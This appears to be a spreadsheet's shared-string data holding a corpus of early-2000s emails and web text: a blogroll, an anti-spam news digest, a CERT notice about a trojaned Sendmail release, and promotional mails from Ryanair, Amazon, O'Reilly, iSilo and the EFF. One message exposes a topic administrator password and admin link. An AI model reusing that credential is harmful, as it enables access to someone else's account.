    the voodoo lounge v.4.0.1
      http://www.beatsrhymesnlife.com/VoodooChild.htm
    Ich Bin Ein Iraqi
      http://blogs.salon.com/0001600/
    The Rat's Hole
      http://vase.surreally.org/theratshole
    Forget I Said That
      http://mark.nosuch.org/
    Eenie-Meenie-Moni-Blog
      http://www.hipessentials.com/mtype/eenie/
    yens weblog
      http://yen.love-always.net/index.php
    Substance abuse
      http://radio.weblogs.com/0108660/categories/substanceAbuse/
    throughyoureyes dot com
      http://throughyoureyes.com/
    mindtrance
      http://www.mindtrance.net/
    Azure's Blog
      http://www.azurejim.com/blog
    Yudel's Cool Web Resources
      http://www.shmoozenet.com/yudel/categories/yudelSCoolWebResources/
    wine
      http://www.tizwine.com/winenews/
    YudelLine
      http://www.shmoozenet.com/yudel/
    Daily Value Not Established
      http://aqua.odnc.net/weblog.html
    unsortable / journal
      http://www.unsortable.com/journal
    m i n u t i a e
      http://www.gigasprite.com/blog/
    tooï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½&amp;nbspbad&amp;it's;too;late
      http://orenji-blossom.net/nimisha/index.php
    A Blog by Sue
      http://snowhite.antville.org/
    existentialmoo
      http://existentialmoo.com/moo
    JohnLawlor.com
      http://radio.weblogs.com/0113942/
    rc dot org - news
      http://www.rabenclan.org/
    OFD
      http://ofdnews.com/index.php
    Spot Light
      http://www.spot-light.virgin-lands.co.uk/blog.php
    The Post-Church Church
      http://radio.weblogs.com/0113335/
    arwen.org
      http://www.arwen.org/
    More Inhuman Than Human
      http://www.biscuitindex.com/mith.html
    Mnemo-zine
      http://www.bizzaps.com/log/radio/
    Analog Cereal
      http://www.dependentfilms.net/pjz/bluebox.php
    bitchery.net
      http://www.bitchery.net/
    The Other Side
      http://other_side.blogspot.com/12:12am
    ctop
      http://ctop.fallingamongbandits.com/
    shutterclog
      http://radio.weblogs.com/0110604/
    Bag and Baggage
      http://bgbg.blogspot.com/
    elearningpost
      http://www.elearningpost.com/
    Bryce's PDA Channel
      http://radio.ntwizards.net/categories/pda/
    Bryce's Radio Experiments
      http://radio.ntwizards.net/
    GesternWarNichtHeute Radio
      http://radio.gesternwarnichtheute.de/
    i know what i know. i sing what i said.
      http://www.littlemeanfish.com/blogstuff/weblog.php
    My Life...in bits and pieces
      http://azuremariposa.blogspot.com/
    chocophile.com
      http://www.chocophile.com/
    Pam's Life
      http://www.pamslife.com/blog.html
    ZackScott.net
      http://www.zackscott.net/
    news junkie
      http://www.bobupndown.com/chad
    Shafer on Sports
      http://radio.weblogs.com/0001285/categories/shaferOnSports/
    Commander's Report
      http://128.32.250.15:8080/destra/
    Empty Spaces
      http://www.raymarino.com/
    Butterfly.Dreams
      http://www.california-cutie.com/blog
    fivefootnine.org|blog
      http://fivefootnine.org/blog/index.html
    Between Coffees
      http://www.anthonymalloy.com/
    News
      http://WWW.FRISSION.NET/
    d/blog
      http://www.sankey.ca/d/blog
    this if
      http://this-if.nathair.com/
    Mon chemin pour maigrir (sur MonBlogue.com)
      http://sophie_brunet.monblogue.com/
    Feedback
      http://www.blogstudio.com/Feedback/index.html
    Heart Whispers
      http://heartwhispers.com/blog/index.html
    Alicia Keys Fan - Live News
      http://akf.monosyllabically.com/index.php
    Intellectual Poison
      http://home.pacbell.net/figan/fenriq.html
    Held in Contempt
      http://www.heldincontempt.com/
    soundbitten
      http://www.soundbitten.com/
    dodoskido
      http://dodoskido.com/
    J Mo's Journal
      http://www.j-mo.com/
    keanuvision.....you had me at 'Whoa'
      http://www.keanuvision.com/mt
    The Temple of Moi
      http://www.theminister.net/ezra.html
    My Life, Text Only Version
      http://aaron.verberweb.com/
    jess3
      http://www.jess3.com/
    chess diary
      http://i.cantcode.com/chess/
    joanie
      http://www.hooptymike.com/joanie
    Caption of the Day
      http://dailypics.blogfodder.net/
    john mahoney's radio weblog
      http://radio.weblogs.com/0110735/
    Write It In Your Caffeine Diary
      http://caffeinediary.blogspot.com/
    OS X
      http://radio.weblogs.com/0001285/categories/osX/
    this page intentionally left blank
      http://thispageintentionallyleftblank.net/
    Viviculture Weblog
      http://www.viviculture.org/weblog/
    Pinwiz.net
      http://www.pinwiz.net/
    i.cantcode.com
      http://i.cantcode.com/
    Prof. Scammington's Faculty Lounge
      http://scammington.blogspot.com/
    Dancing with Dogs (or Those Crazy Asians)
      http://madhoo.blogspot.com/
    War on Iraq
      http://www.matrixmasters.com/world/america/iraq/iraqwar01.html
  </t>
  </si>
  <si>
    <t xml:space="preserve">spamNEWS: Providing the news about junk E-mail to Internet professionals        
______________________________________________________________________________
This is a weekly digest form of spamNEWS, posted to USENET and spam-oriented mailing lists. For the complete, DAILY VERSION of spamNEWS, including a weekly calendar of email-related events and conferences, free confirmed opt-in subscriptions are available at http://survey.whitehat.com/survey.php?s=2650
________________________________________________________________________________
Did we miss something? Know of a hot story? Send leads to: http://survey.whitehat.com/predirect.php?c=6688
________________________________________________________________________________
spamNEWS DATABASE @ SPAMCON.org http://survey.whitehat.com/predirect.php?c=6689
________________________________________________________________________________
spamNEWS is sponsored by POSTINI http://survey.whitehat.com/predirect.php?c=6687
________________________________________________________________________________
SPAM FILTERING TECHNIQUES - IBM developerWorks 9/1/2002 HELP ON THE WAY IN SPAM WARS - internet.com 9/17/2002 ACTIVESTATE RELEASES PERLMX 2.1 - Canada IT 9/18/2002 SPAM: E-MARKETING'S ALTER EGO - CRM 9/19/2002 NEW WEAPON IN THE WAR AGAINST SPAM: CATS - Seattle Times 9/21/2002 FOCUSED APPS EASE E-MAIL OVERLOAD - eWEEK 9/23/2002 MARKETERS USE TRICKS TO SPAM YOU - News Channel 8 9/25/2002 NEEDED NOW: LAWS TO CAN SPAM - Business Week 9/26/2002 BEWARE OF SECONDHAND SPAMMING - DM News 9/26/2002 WILL E-MAIL KILL WALL STREET? - Forbes 9/26/2002 CALIFORNIA SUES MARKETING FIRM FOR SPAMMING - Mercury News 9/26/2002 U DECLARES WAR ON SPAM E-MAIL; FILTERS TO DEBUT - Minnesota Daily 9/26/2002 ONLINE PAYMENT SERVICE PAYPAL HIT BY SCAM - Computer World 9/27/2002 AMAZON TO TUNE PRIVACY POLICY - E-Commerce Times 9/27/2002 WHAT DO YOU USE TO BATTLE SPAM? - eWEEK 9/27/2002 SPAM, AND WHAT YOU CAN DO ABOUT IT - INT Media Group 9/27/2002 UNIVERSITY TAKES AIM AT CAMPUS SPAM - Internet Broadcasting Systems 9/27/2002 STUDY: E-MAIL TO DOUBLE BY 2006 - internetnews.com 9/27/2002 GOOD NEWS ON PRIVACY - Nando Media 9/27/2002 SPAM-BUSTER BRIGHTMAIL DELIVERS - San Francisco Business Journals 9/27/2002 THE FUTILE FIGHT AGAINST SPAM - St. Petersburg Times 9/27/2002 VIRUSES ARE DEAD. LONG LIVE VIRUSES! - The Register 9/27/2002 EMAIL REMOVER 3.0 - VNU 9/27/2002 ANTI-SPAM LAWS A TOUGH 'CELL' - Wired 9/27/2002 LONG ARM OF THE LAW STRETCHES - News.com AU 9/28/2002 SPAM - Boston Globe 9/29/2002 FIGHT BACK AGAINST E-MAIL SPAM - Calgary Herald 9/30/2002 ADVERTISING BY E-MAIL -- WITHOUT RAISING HACKLES! - eMail Results 9/30/2002 TOWARD OPTIMAL CYBERSPACE SECURITY - eWEEK 9/30/2002 TIME TO CAN THE SPAM - Federal Computer Week 9/30/2002 ANTI-SPAM CULTURE HELPED SPAWN LIST THEFT - iMarketing News 9/30/2002 SPAM BUSTERS - Independent Digital 9/30/2002 HOLD THE SPAM - Information Week 9/30/2002 SMS SPAM PROBLEM STARTS TO SNOWBALL - Inquirer 9/30/2002 STATE PROSECUTORS TRYING TO DELETE SPAM - Los Angeles Times 9/30/2002 KILL THAT SPAM! - Mercury News 9/30/2002 NEW 'BUGBEAR' BITES NET USERS - MSNBC9/30/2 9/30/2002 THE LAST MILE - Network Computing 9/30/2002 TIRED OF SPAM? - New York Times Service 9/30/2002 CALEO &amp; EMERIS ON EMAIL QUEST - Opt-in News 9/30/2002 EUNIVERSE ACQUIRES RESPONSEBASE - Opt-in News 9/30/2002 ECLEANER V2.01 - PC World 9/30/2002 SPAM OPPONENTS TURN TO LAWSUITS TO STOP JUNK E-MAIL - Reuters 9/30/2002 EU MULLS DATA PRIVACY LAW REVIEW - Reuters 9/30/2002 VODAFONE IRELAND FACES SKI SPAM ALLEGATIONS - The Register 9/30/2002 YOU HAVE MAIL: 31 BILLION A DAY - VNU 9/30/2002 MARYLAND LAW TARGETS SPAMMERS - Washington Times 9/30/2002 PORN SPAM: IT'S GETTING RAUNCHIER - Wired 9/30/2002 CITING NON-EXISTENT LAW, JUDGE RULES AGAINST SPAM VICTIM - AboutSpam.com 10/1/2002 AOL TO DELIVER ABDUCTED-CHILDREN ALERTS TO ITS 26M MEMBERS - Associated Press 10/1/2002 SURESH RAMASUBRAMANIAN: ANTI-SPAM MAN - Business Week 10/1/2002 WE TRIED EMAIL -- IT DIDN'T WORK - ClickZ 10/1/2002 INTERVIEW WITH SURESH RAMASUBRAMANIAN: OUTBLAZE ANTI-SPAM MAN - CNN 10/1/2002 INTERNET EMAIL ADDRESSES - Computer Bits 10/1/2002 COMPUTER CURMUGEON - Computer Bits 10/1/2002 CALIFORNIA POLS WANT TO BAN CELL PHONE SPAM - DIRECT Newsline 10/1/2002 BIG PUSH FROM IBM ON LOTUS APPS - Information Week 10/1/2002 IBM'S NOTES UPGRADES FOCUS ON COLLABORATION, COSTS, STOPPING SPAM - InternetWeek 10/1/2002 EMAIL MARKETER SEARCHES FOR PARTNER - Opt-in News 10/1/2002 HOW SECURE IS INSTANT MESSAGING? - PC World 10/1/2002 DON'T REACH OUT AND TOUCH THIS SOMEONE, ESPECIALLY AT DINNERTIME - Scripps-McClatchy Western Service 10/1/2002 NOIE SPAM REVIEW GETS 32 SUBMISSIONS - The Age 10/1/2002 DEAR SPAM, GLAD YOU'RE NOT HERE ... - The Age 10/1/2002 FIGHTING SPAM AS AN INDIVIDUAL USER - Yomiuri Shimbun 10/1/2002 COMPANIES THAT SOLD STUDENT DATA SETTLE FEDERAL CHARGES - Associated Press 10/2/2002 OH, THAT DOCTORATE IN BUSINESS ADMINISTRATION - Australian IT 10/2/2002 INTERNET PIONEER DAVE RAND JOINS PEER 1 NETWORK BOARD OF DIRECTORS - Canadian Corporate News 10/2/2002 COMBATING SPAM - CBS Marketwatch 10/2/2002 FAINT POLITICAL VOICES RISE FROM E-MAIL - CNET News.com 10/2/2002 YAHOO MARKETING ANGERS STORE OWNERS - CNET News.com 10/2/2002 FBI NAMES MOST WANTED SECURITY FLAWS - CNET News.com 10/2/2002 LISTS LIVE ON AFTER COMPANY IS GONE - DM News 10/2/2002 COMMUNICATIONS SURVEILLANCE - Email 10/2/2002 BUGBEAR VIRUS STILL RUNNING WILD - eWeek 10/2/2002 TANATOS - A WORM WITH A "TROJAN" IN ITS POCKET - INB 10/2/2002 WAYS TO PUT YOUR COMPUTER ON A SPAM-FREE DIET - SuburbanChicagoNews 10/2/2002 PIONEERS IN THE EMAIL HIGHLANDS - ClickZ 10/3/2002 OUTLOOK, EXCHANGE TO GET NEW FEATURES - CNET News.com 10/3/2002 JUDGE ORDERS FCC TO STOP PURSUIT OF FAX.COM - DM News 10/3/2002 INFORMATION INUNDATION - INT Media Group 10/3/2002 READER REVIEW: HOW I USE OPEN-SOURCE TOOLS TO STUNT SPAM - InternetWeek 10/3/2002 OUR VIEWS: FTC SHOULD CURB SPAM AVALANCHE - Los Angeles Times 10/3/2002 SPAMFIRE FILTERS OUT A JAGUAR UPDATE - Mac Observer 10/3/2002 FILTERING TOOLS OFFER HOPE AGAINST SPAM ONSLAUGHT - Mike Langberg 10/3/2002 EMAIL MARKETING TUNE-UP GUIDE - Opt-in News 10/3/2002 KINDER SHIELD LABS INTRODUCES CHILD SAFE EMAIL SOFTWARE - PR Newswire 10/3/2002 NIGERIAN EMAIL SCAM BROKEN UP - Sydney Morning Herald 10/3/2002 CALIFORNIANS SEEK SPAM SHELTER - Wired 10/3/2002 PSYCHIC NETWORK EXECS PLEAD GUILTY, MISS CLEO HEADS FOR HEARING - DM News 10/4/2002 APPLE NETWORKING TAKES A GIANT LEAP WITH JAGUAR - Wall Street Journal 10/4/2002 HABEAS NAMES SPAM AUTHORITY TO HEAD PRODUCT MARKETING - Press Release 10/3/2002 
________________________________________________________________________________
spamNEWS is sponsored by POSTINI http://survey.whitehat.com/predirect.php?c=6687
________________________________________________________________________________
spamNEWS is published by Pete Moss Publications, Montreal, Canada.
spamNEWS is a trademark of Pete Moss Publications. ISSN 1499-075X
Compilation copyright 2002 by Neil Schwartzman, all rights reserved.
All stories are the copyright of the individual authors and publishers cited.spamNEWS in any of its forms (web, e-mail, archive) is intended to enhance and provide information. No claim is made as to the accuracy or authenticity of the material provided here. Pete Moss Publications neither extends nor assumes any liability with regard to the information quoted herein.All broadcast, publication, re-transmission to e-mail lists, the WWW or any other copying or storage, in any medium, on-line or not, must include this section and no fee may be charged for access to this compilation.--------------------------------------------------------------------------
spamNEWS is powered by Whitehat http://survey.whitehat.com/predirect.php?c=6695
--------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Here is your administrator password for your Quick Topic(SM)
topic "testing for taint.org, part 2", as you requested:
    litheersUse your browser to follow the 'Admin/Delete' link on your topic
page, or instead go straight to the following web address, where
you can delete individual messages or delete the entire topic:
http://www.quicktopic.com/16/A/ESg5mArsyEDKOnce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
</t>
  </si>
  <si>
    <t xml:space="preserve">
    Cliped from the latest CERT.org warning list:-----------------------------------------------------------------------------------------------
"I. Description   The  CERT/CC  has received confirmation that some copies of the source
   code  for  the  Sendmail  package have been modified by an intruder to
   contain a Trojan horse.   The following files were modified to include the malicious code:     sendmail.8.12.6.tar.Z
     sendmail.8.12.6.tar.gz   These  files  began  to  appear  in  downloads  from  the  FTP  server
   ftp.sendmail.org  on  or  around  September  28,  2002.  The  Sendmail
   development  team  disabled  the  compromised FTP server on October 6,
   2002  at  approximately  22:15  PDT.  It  does  not appear that copies
   downloaded  via  HTTP contained the Trojan horse; however, the CERT/CC
   encourages  users  who  may  have  downloaded the source code via HTTP
   during  this  time  period  to take the steps outlined in the Solution
   section as a precautionary measure."     OK, it's now time to work out the PGP securing of apt repository traffic. I've never gotten anything but "sitename.whatever will not be authenticated" until running Redhat 8.0 when I get something about having "No Key" for various files.    What's it take to ensure we're covered against this kind of childish/moronic/Microsoft-era problems?
------------------------------------------------------------------------
Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
angegangen, Schlange-HÃ¼ften, sein es ganz rÃ¼ber jetzt. BÃ¼gel innen fest,
weil es eine lange, sÃ¼sse Fahrt ist. _______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Our Car Hire partners, Hertz, have some great deals on car rental over   
the Christmas period.To book online click http://www.ryanair.com/redirect/hertzredirect.htmlUnited Kingdom
 + Rent a Group A Car (Ford Fiesta 1.25 or similar) for the fully   
inclusive daily price from Euro Â£38.13Ireland
 + Rent a Group B Car (Opel Corsa 1.2 or similar)for the fully inclusive   
daily price from Stg Â£38.00France
 + Rent a Group A Car (Opel Corsa Comfort 1.0 or similar) for the fully   
inclusive daily price from Stg Â£18.68Italy
 + Rent a Group A Car (Opel Corsa 1.2 or similar) for the fully inclusive   
daily price from Stg Â£20.44Germany
+ Rent a Group A Car (VW Lupo 1.0 or similar) for the fully
inclusive daily price from Stg Â£18.55
Austria
+ Rent a Group A Car (Ford Fiesta 1.3 or similar) for the fully
inclusive daily price from Stg Â£33.63
Belgium
+ Rent a Group A Car (Ford Fiesta 1.3 or similar) for the fully
inclusive daily price from Stg Â£20.43
Netherlands
+ Rent a Group A Car (Fiat Seicento 0.9 or similar) for the fully
inclusive daily price from Stg Â£15.10
Norway
+ Rent a Group A Car (VW Lupo 1.0 or similar) for the fully
inclusive daily price from Stg Â£34.52
Sweden
+ Rent a Group A Car (Ford Fiesta 1.3 or similar) for the fully
inclusive daily price from Stg Â£27.54Denmark
+ Rent a Group A Car (Opel Corsa 1.4 or  similar) for the fully
inclusive daily price from Stg Â£35.96+ The	 daily rate quotes are based on a 7 day car rental quotation,
picked up between 23rd - 29th December inclusive.
HERTZ FULLY INCLUSIVE RATES INCLUDE:
UNLIMITED MILEAGE, COLLISION DAMAGE WAIVER,
THEFT PROTECTION, AIRPORT FEE AND TAXTo book online click http://www.ryanair.com/redirect/hertzredirect.htmlor call the Ryanair Direct - Hertz priority booking line on:
0871 246 0002(UK only)
0818 304 304 (Ireland)
00 353 818 304 304 (International Calls)Rates are subject to availability.Ryanair airport locations only.Drivers must be over 25 with a full clean driving licenceEnjoy a Free Upgrade in the Netherlands!Make more of your next trip to the Netherlands with a free upgrade when   
you book a CCMR Ford Focus 1.6 or above until 31 December 2002!To take advantage of this offer, simply:
*	Click on the book it on-line button below
*	Select the car you wish to pay for and you will be upgraded to the next   
car group at time of rental, for example, if you book an IDMN Seat Toledo   
1.6 you will be upgraded to a SCMR Audi A4 or similar.
Termsandconditions
This offer is exclusive to Ryanair customers. Offer is valid for rentals   
picked up at Eindhoven airport until 31 December 2002. Offer valid on   
reservations of car group CCMR or above and excludes automatics. Offer is   
subject to availability. Hertz standard terms and conditions apply.
To book online click http://www.ryanair.com/redirect/hertzdirect.htmlOr call the Ryanair Direct - Hertz priority booking line on:
0871 246 0002 ( UK Only )
0818 304 304 ( Ireland )
00 353 818 304 304 ( International Calls )====================================================================E-MAIL DISCLAIMERThis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unlawful.If you have received this e-mail in error
please notify Ryanair Holdings plc by emailing postmaster@ryanair.ie
or contact Ryanair Holdings plc, Dublin Airport, Co Dublin, Ireland.=====================================================================E-MAIL DISCLAIMERThis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
</t>
  </si>
  <si>
    <t xml:space="preserve">"HTTP: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servers.To order your copy or for more information
(including sample chapter, Table of Contents, 
index, etc), see:
http://www.oreilly.com/catalog/httptdg/?CMP=EM8586
or call 1-800-998-9938
or email orders@oreilly.comHTTP: The Definitive Guide 
By David Gourley, Brian Totty
With Marjorie Sayer, Sailu Reddy, Anshu Aggarwal
1-56592-509-2, Order Number: 5092
656 pages, $44.95 US $69.95 CA 31.95 UK
http://www.oreilly.com/catalog/httptdg/?CMP=EM8586-----------------------------------------------------------------
If you want to cancel your subscription to this 
newsletter, or add subscriptions to other topics, 
go to: http://www.oreillynet.com/cs/user/home For non-automated human help email 
help@oreillynet.com
---------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">For almost a year, we've been working on a new effort that we're
finally ready to show you. We're proud to introduce our new Apparel
and Accessories store with over 400 major clothing brands (including
Gap, Old Navy, Nordstrom, Lands' End, Target, Eddie Bauer, Foot
Locker, and many more).Our goal is to provide complete apparel selection and offer it the
Amazon wayï¿½-with easy navigation, a single shopping cart, your
shipping and payment information already on file, etc. Of course, none
of this would be possible without our many apparel store partners
(we're thankful to have such an amazing group of companies working
with us).We released a beta version of the Apparel store about a week ago, and
much to our surprise, tens of thousands of clothing and accessory
items have already been ordered. Through the first few days of our
beta, customers have ordered:* 14,487 shirts (Polo Ralph Lauren button-downs to DKNY blouses)* 1,843 jackets (Old Navy fleece to Polartec windbreakers)* 2,712 sweaters (Eddie Bauer V-necks to Liz Claiborne cardigans)* 140 swimsuits (Tommy Bahama to Speedo)* 9,408 pants (Gap khakis to Guess jeans)* 485 skirts (Nordstrom suede to Spiegel leather)* 1,461 sleepwear items (Marshall Field's satin robes to Lands' End
  flannel pajamas)* 3,254 pairs of shoes (Nike Air Max to Nine West boots)* 1,870 pairs of socks (Cole Haan cashmere-blend to OshKosh B'Gosh
  cotton)* 2,805 accessories (handbags, watches, scarves, etc.)* 3,287 pairs of underwear (Jockey briefs to Hugo Boss boxers). We all
  need clean underwear, right?We hope you'll check it out. You'll get a $30 promotional certificate
when you spend $50 or more in the new Apparel store (see details
below). We'd especially appreciate any feedback you have (please
reply to this email to share your thoughts).http://www.amazon.com/apparelSincerely,Jeff Bezos
Founder &amp; CEO
Amazon.com----------------------------------------------------------------------
To receive your $30 Amazon.com promotional certificate, click through
to:http://www.amazon.com/appareland see the prominent link for the $30 offer. All details are there.
We hope you enjoyed receiving this message. However, if you'd rather
not receive future e-mails announcing new store launches, please click
the Your Account button in the top right corner of any page on the
Amazon.com Web site. In the Personal Information box under the Account
Settings heading, click the "Update your communication preferences"
link.Please note that this message was sent to the following e-mail
address: yyyy@netnoteinc.com
</t>
  </si>
  <si>
    <t xml:space="preserve">----------------------------------------------------------------------
1. iSilo(TM) 3.25 for Palm OS, Pocket PC, and Windows enters beta1
2. iSilo(TM) 3.25 for Windows CE Handheld PC enters beta1
3. iSiloX 3.25 for Windows and Mac OS enters beta1
4. iSiloXC 3.25 for Windows, Linux, FreeBSD, Mac OS X,
   and Solaris enters beta1
----------------------------------------------------------------------======================================================================
1. iSilo(TM) 3.25 for Palm OS and Pocket PC enters beta1
----------------------------------------------------------------------
iSilo(TM) 3.25b1 addresses the following issues from iSilo 3.2:- When highlighting content with a non-zero top margin, the highlight
  may be offset vertically in the downward direction.
- (iSilo for Palm OS) Tapping the application launcher/home silkscreen
  icon while in the password dialog results in a fatal error.
- (iSilo for Palm OS) Documents in /Palm/Launcher may fail to be added
  to the document list.
- (iSilo for Palm OS) Text displays cutoff on the NX60/70V.iSilo(TM) 3.25b1 adds the following new features to iSilo 3.2:- Added support for hyperlink mode for iterating through currently
  visible hyperlinks.
- Added support for starting on the home page of a document if the
  document was converted with the option for doing so if the document
  date differs from the document date the last time the document was
  opened.
- (iSilo for Palm OS) For Palm OS 5, added ability to display an
  image at double the image's width and height.
- (iSilo for Pocket PC) When renaming files, if the original file
  name had a three letter extension, then add it to the new file name
  if it does not end with a period nor have a three letter extension.Please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iSilo(TM) 3.25b1 for Palm OS(R), please go to this URL:    To download iSilo 3.25b1 for Pocket PC, please go to this URL:    To download iSilo 3.25b1 for Windows , please go to this URL:    
======================================================================
2. iSilo(TM) 3.25 for Windows CE Handheld PC enters beta1
----------------------------------------------------------------------
iSilo(TM) 3.25 will be the first version of iSilo for Windows CE
Handheld PC and has the requirements shown here.Basic requirements:
- Windows CE Handheld PC Edition version 3.0, Windows CE Handheld PC
  Professional Edition version 3.0, or Windows CE Handheld PC 2000
- Storage memory for application executable file (dependent on
  processor): ARM: 579K, MIPS: 627K
- To determine your processor type go to the Start menu, tap Settings, tap
  Control Panel, double-tap System, and then go to the Device tab.
- 86K storage memory for supporting documents
- 512K free program memory (1MB recommended)Additional functionality specific requirements:
- Additional memory required for document storage.
- iSiloX required for creating documents utilizing maximum document
  presentation capabilities.Please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 3.25b1 for Windows CE Handheld PC, please go
to this URL:    
======================================================================
3. iSiloX 3.25 for Windows and Mac OS enters beta1
----------------------------------------------------------------------
iSiloX 3.25b1 addresses the following issues from iSiloX 3.2:- Maximum width and height settings for images would not be applied
  to images referenced by an image tag with a width or height
  attribute specification greater than the native width or height
  of the image.
- Within a block with a non-zero text indent, a line following a
  forced break with the  tag with markup at the beginning
  of the line would incorrectly be indented.
- If a parent element specifies a font-size using ems, then the
  child element would incorrectly also inherit the specification
  instead of the computed font-size value.  For example, in the
  case where the parent element specified 2em, the actual computed
  value of the child would be 4em (e.g., 2 * 2em = 4em).
- Upon reopening a .ixl file containing a document entry with the
  receive cookies option on, the option would be reset to off.
- In a .ixl file, if an element is specified but has no content,
  the .ixl file may fail to open.iSiloX 3.25b1 adds the following features to iSiloX 3.2:- In the Document properties, added a home page section for specifying
  the document home page number and whether or not to open the
  document on the home page when the document date changes.
- In the Text properties, for preformatted text, added an option
  for specifying whether or not to use a monospace font.
- In the Text properties, for preformatted text, added an option
  for specifying whether to keep all single line breaks, remove all
  single line breaks, or only keep single line breaks if a space or
  tab character follows.Please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 3.25b1 for Windows, please go to this URL:    To download iSiloX 3.25b1 for Mac OS, please go to this URL:    
======================================================================
4. iSiloXC 3.25 for Windows, Linux, FreeBSD, Mac OS X,
   and Solaris enter beta1
----------------------------------------------------------------------
iSiloX 3.25b1 addresses the following issues from iSiloX 3.2:- Maximum width and height settings for images would not be applied
  to images referenced by an image tag with a width or height
  attribute specification greater than the native width or height
  of the image.
- Within a block with a non-zero text indent, a line following a
  forced break with the  tag with markup at the beginning
  of the line would incorrectly be indented.
- If a parent element specifies a font-size using ems, then the
  child element would incorrectly also inherit the specification
  instead of the computed font-size value.  For example, in the
  case where the parent element specified 2em, the actual computed
  value of the child would be 4em (e.g., 2 * 2em = 4em).
- Upon reopening a .ixl file containing a document entry with the
  receive cookies option on, the option would be reset to off.
- In a .ixl file, if an element is specified but has no content,
  the .ixl file may fail to open.iSiloX 3.25b1 adds the following features to iSiloX 3.2:- Under , added the  and
   elements for specifying the document
  home page number and whether or not to open the document on the
  home page when the document date changes.
- Under , added the  element
  for preformatted text for specifying whether or not to use a
  monospace font.
- Under , added the  element
  for preformatted text for specifying whether to keep all single
  line breaks, remove all single line breaks, or only keep single
  line breaks if a space or tab character follows. See .ixl file
  format for more information.Please note that this is a beta version of the software, and as
such is intended for testing purposes to help eliminate problems
and issues before the release.Please report any problems or issues you encounter by sending an
email to email@iSilo.com.  When reporting problems, please include
all potentially relevant details, including the exact steps used
to reproduce the problem, OS version, and hardware configuration.To download iSiloXC 3.25b1 for Windows, please go to this URL:    To download iSiloXC 3.25b1 for Linux, please go to this URL:    To download iSiloXC 3.25b1 for FreeBSD, please go to this URL:    To download iSiloXC 3.25b1 for Mac OS X, please go to this URL:    To download iSiloXC 3.25b1 for Solaris, please go to this URL:    
----------------------------------------------------------------------
You have received this message because you subscribed to the
iSilo(TM) mailing list.  If you would like to be removed from
this list, please send an email with the subject "unsubscribe"
to: .Please note that this email address only handles subscriptions
and unsubscriptions of the mailing list.  Any other messages
sent to this email address are automatically deleted.----------------------------------------------------------------------
iSilo(TM)             http://www.iSilo.com             email@iSilo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">EFFector       Vol. 15, No. 35       November 8, 2002     ren@eff.orgA Publication of the Electronic Frontier Foundation     ISSN 1062-9424In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AdministriviaFor more information on EFF activities &amp; alerts: http://www.eff.org/To join EFF or make an additional donation:
  http://www.eff.org/support/
EFF is a member-supported nonprofit. Please sign up as a member today!-----------------------------------------------------------------* ALERT UPDATE: Urge Your Representative to Co-Sponsor the DMCRA!As the legislative season ends, it is vitally important to gather
support for legislation that will be center-stage in the next session.
This is an opportunity to ask your representative to take a stand for
your rights. Ask her/him to co-sponsor the DMCRA today!Representatives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(DMCA).Take action here:
http://action.eff.org/action/index.asp?step=2&amp;item=2224Join EFF! For membership information see:
http://www.eff.org/support/-=end=-----------------------------------------------------------* ALERT: Bait and Switch; Anticounterfeiting Bill Hurts Your Rights!Don't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2935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behaviorThis "anticounterfeiting" bill is a decoy; stand up for your rights
today! Subscribe to the EFF Action Center and send your member of
Congress an email, letter or fax. You can take action by going to:http://action.eff.org/action/index.asp?step=2&amp;item=2274Join EFF! For membership information see:
http://www.eff.org/support/-=end=-----------------------------------------------------------* Canadian Trademark Law OverreachingEFF has been involved in several cases involving overreaching
trademark claims on the Internet. Recently we have learned about a
Canadian lawsuit over the website www.lawsnet.com, a nonprofit legal
information website focusing on the laws of Canada and China that seem
especially egregious.Lawsnet.com is a free legal information website that has been
published since 1998. Last year, Lawsnet.com's owner Ling Xia was sued
by Quicklaw, a subsidiary of global publishing giant LexisNexus Group.
Quicklaw claims that Lawsnet.com violates its rights in the name
LAW/NET. However, LAW/NET does not have a public Internet website
under that domain name. The name appears on a subsidiary webpage of
the Quicklaw.com website that offers public "teasers" in the form of
summaries of recent Canadian cases, with the full text only available
through the private, proprietary paid Quicklaw service for Canadian
lawyers. It seems clear that the two names are substantially
different, are used in different places (one as a teaser for a closed
computer service and the other for information freely available on the
public internet) and are not causing any consumer confusion. Even more
problematic, Quicklaw does not even have a Canadian trademark in the
term LAW/NET -- it applied for one in 1997 but has repeatedly filed
requests for extensions of time with the Canadian trademark
authorities. In contrast, Ms. Xia is in the final stages of having a
Canadian trademark issued for "lawsnet."Regardless of its weak case, Quicklaw has managed to drag Ms. Xia
through over a year of litigation and recently succeeded in securing a
court order requiring her to undergo an extensive "discovery" process
that threatens to drive her under. Although she has had some free
legal assistance in the past, this next phase will require
significantly more legal resources than her volunteer attorneys can
muster. Quicklaw is represented by a large Toronto firm, Borden Ladner
and Gervais, LLP.Abuse of trademark law (even here, when no official trademark has even
been granted) is a growing problem on the Internet, and it is
unfortunately becoming an international problem. EFF urges Quicklaw,
and its US-based parent company, to stop beating up on this free and
useful website. While trademark law is important when misuse of a mark
is causing consumer confusion, it does not -- and should not -- grant
ownership in words, especially descriptive words like "laws" and "net"
when describing an online legal information service. Trademark law
should also not be a license for large corporations who sell legal
information (or any other nonproprietary information) to stop
individuals who want to use the power of the Internet to provide free
legal information to the public.For those who wish to help Ms. Xia directly, local Toronto lawyer and
part-time law professor Gil Lan has agreed to act as trustee for a
legal defence fund to be established for Ms. Xia. If you wish to help,
please contact:Mr. Gil Lan
Barrister &amp; Solicitor
393 University Avenue
Suite 2000
Toronto, Ontario, M5G 1E6or by email at:
glan@globalbusinesslaw.comor Ling Xia at:
editor@lawsnet.com-=end=-----------------------------------------------------------* Give Twice as Many Gifts this Holiday Season!EFF has signed up with ShopsThatGive.com, a portal site for dozens of
online shops that donates a portion of their referral fees to a
charity of your choice. If you shop online at any of the websites
available through ShopsThatGive, including Alibris, buy.com, Disney
Store, eBay, eToys, Half.com, Lens Express, McAfee, Office Depot,
Palm, Petsmart, REI, Rail Europe, and Verizon Wireless, part of your
